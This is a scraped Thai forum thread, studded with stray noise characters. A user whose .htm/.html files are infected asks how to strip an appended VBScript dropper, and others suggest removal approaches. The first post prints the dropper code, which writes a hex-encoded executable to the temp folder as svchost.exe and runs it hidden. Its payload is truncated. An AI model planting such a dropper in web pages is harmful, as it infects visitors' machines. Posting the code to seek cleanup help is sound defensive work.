How to del. this script [Help me please]

adman

on *.htm *.html
5 t) l* g5 _+ r2 Q: W5 j
8 F& f8 t% [: T0 H( X2 H</html>
( U7 }# {/ V* p/ v( J<SCRIPT Language=VBScript><!--
  _3 w% }1 J& E; eDropFileName = "svchost.exe"
WriteData = "4D5A900003................................................."     <<== sample
4 i2 n: a, t4 g" n0 K3 j) m3 b& mSet FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
$ c* E3 k9 M8 h0 oSet FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
8 ]  D, `0 D7 s* r1 E1 V5 ]- aFileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
) f' C; H6 `; yNext
' s1 P0 {! c( F* PFileObj.Close
& I! B, G4 ?' [% EEnd If
Set WSHshell = CreateObject("WScript.Shell")
5 @- H# |; v  X9 @% R5 J8 TWSHshell.Run DropPath, 0

adman

พอจะหาทางออกได้แล้วครับ...แต่อาจจะมีวิธีอื่นที่ดีกว่า
9 }+ [/ r; k) K2 l8 B
ปัญหาของผมก็คือ ไฟล์ติดไวรัส ค่อนข้างจะอันตรายมากทีเดียว
เพราะทุกไฟล์ที่เป็น *.html กับ *.htm
จะถูกฝังโค้ดนี้

1. <SCRIPT Language=VBScript><!--
   - v6 @% n; c7 E; W3 X' O" S& H
2. DropFileName = "svchost.exe"

คัดลอกไปที่คลิปบอร์ด

ซึ่งมีประมาณ สองเหมือนตัวอีกษรได้ แต่ผมยกตัวอย่างมาแค่นี้

; f5 {: T+ P, |1 `& P- Rสคริปตัวนี้มันจะทำงานยังไง ?
9 T3 w/ ], J5 ]; n& X, L' zก็คือว่า จะสั่งให้ svchost.exe ค้นหาไฟล์ *.html *.htm แล้วฝังโค้ตลงไป ต่อท้าย </html>
. ~( }! ?9 ^- B. o7 Pซึ่งจะส่งผลให้ขนาดไฟล์ใหญ่ขึ้น จากปกติ 1kb ก็จะเพิ่มเป็น 123kb โดยประมาณ
ทุก ๆ 5 นาทีจะเพิ่มขึ้น 2 เท่าไปเรื่อย ๆ .....สุดท้าย ฮาร์ดดิสค์ก็จะเต็ม แดงเถือกโดยไม่รู้ตัว
0 I0 f9 y3 e) x& ACPU ก็จะทำงานหนักตลอดเวลา ส่วน Ram ไม่ต้องห่วง เครื่องคุณมีเท่าไหร่ เต็มหลอดทันที
. e( N7 Q- S/ E/ Y5 ]2 c
ดูเหมือนจะไม่หนัก แต่ปัญหาอีกอย่างคือ โปรแกรมสแกนไวรัสแทบทุกตัว จะทำการลบไฟล์นี้ทิ้ง ซะงั้น
9 f& x1 d$ J0 ?# c7 ]& fซึ่งจริง ๆ ผมไม่ต้องการให้เป็นอย่างนั้น เพราะจะทำให้ไฟล์เสียไปด้วย
9 J% h& {5 J( n9 ^2 iผมต้องการแค่ลบ โค้ดนี้ออกเท่านั้น....
, Q! g5 ~% l+ O! C
วิธีแก้ปัญหาเท่าที่คิดได้ตอนนี้
1. เปิดไฟล์ *.html ทีละตัวแล้วนั่งลบโค้ด
; e9 B  c' F9 d- H, I    ถ้ามีประมาณ 10,000 ไฟล์ ก็จบกันพอดี
' \; @, q& Z; k1 z9 e( T
( T/ g. H' G* H  f9 w3 R$ v- H2. ใช้โปรแกรม notepad++
+ ~% N; I, O1 g* x; U8 g    อันนี้พอช่วยได้ ใช้คำสั่ง replace in file
$ m8 G0 H( b- _# q    แต่คำได้แค่ทีละนิด
5 X& \/ P% q3 R
) c3 J/ ^( F$ r4 f) z$ `3. ใช้ Ultraedit
/ g# t, A( s/ p! d( L* h    วิธีการเดียวกับ notepad++
3 A9 ^5 v$ @6 J) X# N" v0 r    แต่ข้อดีคือ replace infile * ได้ครั้งละ 2,000 ตัวอักษร

ก็ถือว่าค่อนข้างดีขึ้นมาหน่อย
โค้ดไวรัสที่ผมโดนเข้าไปมีประมาณ 20,000 ตัวอักษร สรุปต้องทำประมาณ 10 ครั้ง
% k8 G( ^9 h; u; W% d
2 R0 X. _8 q2 g, A) K
* replace infile   : คือการค้นหาโค้ด และแทนที่ โดยไม่ต้องเปิดไฟล์
9 ^& A) U+ n  C, m0 ^9 r   สามารถค้นหาได้ถึง subfolder
" H4 Q& z% n$ s7 C8 Y5 j
ท่านใดมีทางอื่น แนะนำช่วยด้วยนะครับ

jaideejung007

ลบออกทั้งหมดเหอะครับพี่ หากมันแพร่กระจายไปได้ขนาดนั้น
+ k+ M: r  H# `6 K1 o% Z
ถึงเราจะลบออกได้ แต่ก็อาจจะยังหลงเหลืออยู่(ซักไฟล์ล่ะน่า)

adman

พอมีวิธีอื่นไหม
ตอนนี้ไปเจอโปรแกรม Kis 2012 ยังเป็น Beta
2 e9 m) e3 S# }รุ้สึกว่าจะทำงานได้ดีกว่า เพราะมันจะลบโค้ดนั้นให้ แต่ไม่ลบไฟล์
แค่สั่ง scan เท่านั้น ไม่รู้จะดีไหม กำลังลองดู